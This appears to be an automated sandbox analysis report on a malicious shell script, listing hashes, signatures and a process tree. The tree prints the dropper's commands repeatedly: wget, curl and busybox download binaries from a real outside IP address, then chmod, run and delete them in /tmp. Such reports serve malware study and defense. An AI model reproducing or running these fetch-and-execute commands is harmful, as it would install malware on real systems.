Analysis
-
max time kernel
37s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
-
submitted
21-11-2024 08:32
General
-
Target
cf96cf96c66ebd8661203d14b1a005accb5a1be456552d9e407e067a16981947.sh
-
Size
10KB
-
MD5
6455d6e588df96170309a55c34f9a5fb
-
SHA1
285a51c3374e49307c0244a46a13fc489d56f340
-
SHA256
cf96cf96c66ebd8661203d14b1a005accb5a1be456552d9e407e067a16981947
-
SHA512
eb65d310ae1cbd98fdd88181db8f2667ca296ec34b9187118dbd0d1fb891280c433137d14b63d8876d7c6c35ef14a0eb9501cff9662900ad6bedec1fbda8f053
-
SSDEEP
96:wJqoEYYsFnB9q0XXYQIFxDuu5TWtDxeWusXYQIFxlWQuu5TWtDVnp0vvaR0oEuuZ:wJlYsFnBHcuuEtDMRuuEtD/CN3
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
System Network Configuration Discovery 1 TTPs 20 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/cf96cf96c66ebd8661203d14b1a005accb5a1be456552d9e407e067a16981947.sh/tmp/cf96cf96c66ebd8661203d14b1a005accb5a1be456552d9e407e067a16981947.sh1⤵
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
-
-
/bin/chmodchmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- File and Directory Permissions Modification
-
-
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Executes dropped EXE
-
-
/bin/rmrm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
-
-
/bin/chmodchmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- File and Directory Permissions Modification
-
-
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Executes dropped EXE
-
-
/bin/rmrm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
-
-
/bin/chmodchmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- File and Directory Permissions Modification
-
-
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Executes dropped EXE
-
-
/bin/rmrm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
-
-
/bin/chmodchmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- File and Directory Permissions Modification
-
-
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Executes dropped EXE
-
-
/bin/rmrm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
-
-
/bin/chmodchmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- File and Directory Permissions Modification
-
-
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Executes dropped EXE
-
-
/bin/rmrm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
-
-
/bin/chmodchmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- File and Directory Permissions Modification
-
-
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Executes dropped EXE
-
-
/bin/rmrm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
-
-
/bin/chmodchmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- File and Directory Permissions Modification
-
-
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Executes dropped EXE
-
-
/bin/rmrm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
-
-
/bin/chmodchmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- File and Directory Permissions Modification
-
-
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Executes dropped EXE
-
-
/bin/rmrm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
-
-
/bin/chmodchmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- File and Directory Permissions Modification
-
-
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Executes dropped EXE
-
-
/bin/rmrm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
-
-
/bin/chmodchmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- File and Directory Permissions Modification
-
-
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Executes dropped EXE
-
-
/bin/rmrm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
-
-
/bin/chmodchmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- File and Directory Permissions Modification
-
-
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Executes dropped EXE
-
-
/bin/rmrm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- File and Directory Permissions Modification
-
-
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
-
-
/bin/chmodchmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- File and Directory Permissions Modification
-
-
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Executes dropped EXE
-
-
/bin/rmrm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- File and Directory Permissions Modification
-
-
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
-
-
/bin/chmodchmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- File and Directory Permissions Modification
-
-
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Executes dropped EXE
-
-
/bin/rmrm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
-
-
/bin/chmodchmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- File and Directory Permissions Modification
-
-
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Executes dropped EXE
-
-
/bin/rmrm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
-
-
/bin/chmodchmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- File and Directory Permissions Modification
-
-
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Executes dropped EXE
-
-
/bin/rmrm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- File and Directory Permissions Modification
-
-
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
-
-
/bin/chmodchmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- File and Directory Permissions Modification
-
-
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Executes dropped EXE
-
-
/bin/rmrm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- File and Directory Permissions Modification
-
-
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
-
-
/bin/chmodchmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- File and Directory Permissions Modification
-
-
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Executes dropped EXE
-
-
/bin/rmrm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
-
-
/bin/chmodchmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- File and Directory Permissions Modification
-
-
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Executes dropped EXE
-
-
/bin/rmrm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
-
-
/bin/chmodchmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- File and Directory Permissions Modification
-
-
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Executes dropped EXE
-
-
/bin/rmrm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
-
-
/bin/chmodchmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- File and Directory Permissions Modification
-
-
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Executes dropped EXE
-
-
/bin/rmrm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
-
-
/bin/chmodchmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- File and Directory Permissions Modification
-
-
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Executes dropped EXE
-
-
/bin/rmrm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
-
-
/bin/chmodchmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- File and Directory Permissions Modification
-
-
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Executes dropped EXE
-
-
/bin/rmrm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
-
-
/bin/chmodchmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- File and Directory Permissions Modification
-
-
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Executes dropped EXE
-
-
/bin/rmrm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
-
-
/bin/chmodchmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- File and Directory Permissions Modification
-
-
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Executes dropped EXE
-
-
/bin/rmrm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97